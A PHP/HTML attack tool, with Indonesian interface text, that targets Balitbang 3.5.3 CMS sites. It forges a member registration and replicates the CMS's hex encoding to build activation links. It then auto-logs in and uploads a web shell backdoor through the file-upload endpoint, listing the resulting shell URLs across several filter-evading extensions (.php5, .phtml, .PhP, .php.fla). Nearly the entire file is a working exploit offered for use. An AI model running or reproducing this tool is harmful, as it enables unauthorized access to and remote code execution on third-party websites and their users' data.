<html><head><title>Balitbang 3.5.3</title></head><style type="text/css">

1. <html>
2. <head>
3. <title>Balitbang 3.5.3</title>
4. </head>
5. <style type="text/css">
6. input[type=text],input[type=code],input[type=password]{
7. border:1px solid #c0c0c0;
8. height:24px;
9. padding:5px;
10. }
11. </style>
12. <body>
13. <?php
14. function hex($str='',$code='') {
15. if(($code>=0)and($code<100)) {
16. $t .=dechex(strlen($str)+$code)."g";
17. $str=strrev($str);
18. for($i=0;$i<=strlen($str)-1;$i++) {
19. $t .=dechex(ord(substr($str,$i,1))+$code);
20. }
21. }
22. return $t;
23. }
24. function unhex($str='',$code='') {
25. $all=explode("g",$str);
26. $head=hexdec($all[0])-$code;
27. $content=$all[1];
28. if($head==(strlen($content)/2)) {
29. for($i=0;$i<=$head-1;$i++) {
30. $t .=chr(hexdec(substr($content,$i*2,2))-$code);
31. }
32. $t =strrev($t);
33. }
34. return $t;
35. }
36. $target = $_GET['target'];
37. $ur_target = $target."/member/membersave.php";
38. $ur_upload = $target."/functions/simmateri.php";
39. $captcha = $target."/functions/captcha/captcha.php";
40. $ur_login = $target."/member/ajax_login.php";
41. $userx = $_GET['n'];
42. $passx = $_GET['p'];
43. if(isset($_POST['next'])){
44. $tar = $_POST['tar'];
45. $n = $_POST['n'];
46. $p = $_POST['p'];
47. header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
48. }
49. echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)<hr>";
50. echo "Coded by Cl4yZero";
51. $html_a='<!DOCTYPE html>';
52. $html_a.='<html>
53. <body>
54. <style>
55. body {
56. background-image:url("https://image.ibb.co/eAyrSy/Black_and_red_backgrounds.jpg");
57. background-repeat: no-repeat;
58. background-size: 100% 100%;
59. </style>
60. </body>';
61. ?>
62. <form method="post" action="" enctype="multipart/form-data">
63. <table id=tablebaru cellspacing='1' cellpadding='3'>
64. <tr>
65. <td>Web Target</td>
66. <td>:</td>
67. <td><input type="text" name="tar" size="61" placeholder='http://namaweb.com/'/></td>
68. </tr>
69. <tr>
70. <td>username</td>
71. <td>:</td>
72. <td><input type="text" name="n" size="61"/></td>
73. </tr>
74. <tr>
75. <td>password</td>
76. <td>:</td>
77. <td><input type="text" name="p" size="61"/></td>
78. </tr>
79. <tr>
80. <td></td>
81. <td></td>
82. <td><input type="submit" name="next" value="NEXT &raquo;"/></td>
83. </tr>
84. </table>
85. </form>
86. <hr>
87. <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
88. $asli = hex($userx,"82");
89. $pass = hex($passx,"82");
90. echo "username : <b>$userx</b><br>";
91. echo "password : <b>$passx</b><hr>";
92. ?>
93. <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
94. <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
95. <input type=hidden name='name' value='ganteng'/>
96. <input type=hidden name='username' value='<?php echo $userx;?>'/>
97. <input type=hidden name='password' value='<?php echo $passx;?>'/>
98. <input type=hidden name='email' value='nick@gmail.com'/>
99. <input type=hidden name='kelamin' value='m'/>
100. <input type=hidden name='jenis' value='Tamu'>
101. <input type=hidden name='kelas' value=''/>
102. <input type=hidden name='hari' value='01'/>
103. <input type=hidden name='bulan' value='01'/>
104. <input type=hidden name='tahun' value='2018'/>
105. <input type=hidden name='nis' value=''/>
106. <input type=hidden name='pertanyaan' value='1'/>
107. <input type=hidden name='jawaban' value='1'/>
108. <input type=hidden name='kerja' value='Guru'/>
109. <input type=hidden name='alamat' value='jauh'/>
110. <input type=hidden name='sekolah' value='terserah'/>
111. <input type=hidden name='telp' value='0'/>
112. <input type=hidden name='blog' value=''/>
113. <input type=hidden name='tentang' value='terserah'/>
114. <input type=hidden name='country' value='INDONESIA'/>
115. <input type=hidden name='stprofil' value='open'/>
116. <input type=hidden name='stblog' value='on'/>
117. <table>
118. <tr>
119. <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
120. <td rowspan="2" valign="top"><i>&raquo; capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
121. </tr>
122. <tr>
123. <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
124. <td valign="top"><input type=submit name='submit' value='GO &raquo;'/></td>
125. </tr>
126. </table>
127. </form>
128. <?php
129. echo "<!--
130. ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
131. -->
132. ";
133. echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!.
134. <br><i>&raquo; capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload Shell backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='>>>Upload<<<'/><hr>";
135. } else if(isset($_GET['load']) && $_GET['load'] == "upload"){
136. ?>
137. <script type="text/javascript">
138. window.onload = function(){
139. document.forms['login_form'].submit()
140.  
141. }
142. function setURL(url){
143. document.getElementById('verif').src = url;
144. }
145. </script>
146. <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
147. <input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
148. <input type='hidden' name='password' value="<?php echo $passx;?>"/>
149. Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/>
150. </form>
151. <div style='margin-top:-20px;'>
152. <iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
153. </div>
154. <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
155. <input type='hidden' name='pesan' value='abcabcabc'/></td>
156. <table cellspacing='1' cellpadding='3'>
157. <tr>
158. <td valign='top'>File</td>
159. <td valign='top'>:</td>
160. <td valign='top'><input type='file' name='file'></td>
161. <td valign='top' align='right'><input type='submit' value=' Simpan '/></td>
162. </tr>
163. <tr>
164. <td valign='top' colspan="4"><i>&raquo; capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
165. </tr>
166. <tr>
167. <td valign='top' colspan="6">
168. <h4>Hasil Upload Shell</h4>
169. hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-shell.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-shell.php5";?></a><br>
170. hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-shell.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-shell.phtml";?></a><br>
171. hasil upload (.php): <a href="<?php echo $target."/tugas/tgs-shell.php";?>" target="_blank"><?php echo $target."/tugas/tgs-shell.php";?></a></br>
172. hasil upload (.php6): <a href="<?php echo $target."/tugas/tgs-shell.php6";?>" target="_blank"><?php echo $target."/tugas/tgs-shell.php6";?></a></br>
173. hasil upload (.php.fla): <a href="<?php echo $target."/tugas/tgs-shell.php.fla";?>" target="_blank"><?php echo $target."/tugas/tgs-shell.php.fla";?></a></br>
174. hasil upload (.PhP): <a href="<?php echo $target."/tugas/tgs-shell.PhP";?>" target="_blank"><?php echo $target."/tugas/tgs-shell.PhP";?></a></br>
175. <h4>Hasil Upload Script</h4>
176. hasil upload (.html): <a href="<?php echo $target."/tugas/tgs-sc.html";?>" target="_blank"><?php echo $target."/tugas/tgs-sc.html";?></a><br>
177. hasil upload (.htm): <a href="<?php echo $target."/tugas/tgs-sc.htm";?>" target="_blank"><?php echo $target."/tugas/tgs-sc.htm";?></a></td>
178. </tr>
179. </table>
180. <input type=hidden name='st' value='ganteng'>
181. <input type=hidden name='nis' value=''>
182. <input type=hidden name='idtugas' value=''>
183. </form>
184. <hr>
185. <?php } ?>
186. </body>
187. </html>